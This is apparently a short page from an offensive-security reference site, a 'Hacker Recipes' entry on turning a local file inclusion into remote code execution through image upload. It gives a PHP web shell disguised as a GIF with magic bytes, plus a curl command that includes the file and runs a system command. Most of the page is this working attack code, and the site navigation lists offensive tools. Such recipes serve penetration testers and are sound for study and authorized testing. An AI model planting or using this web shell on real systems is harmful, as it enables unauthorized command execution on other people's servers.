🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🍳 The Hacker Recipes / file upload

file upload

Image Upload

πŸ’‘ Tip
The prerequisite for this method is to be able to [upload a file](/page/hacker-recipes/web/inputs/unrestricted-file-upload). 
# GIF8 is for magic bytes
echo 'GIF8<?php system($_GET["cmd"]); ?' > shell.gif

curl --user-agent "PENTEST" "$URL/?parameter=/path/to/image/shell.gif&cmd=id"
πŸ’‘ Tip
Other LFI to RCE via file upload methods may be found later on the chapter [LFI to RCE (via php wrappers)](/page/hacker-recipes/web/inputs/file-inclusion/lfi-to-rce/file-upload).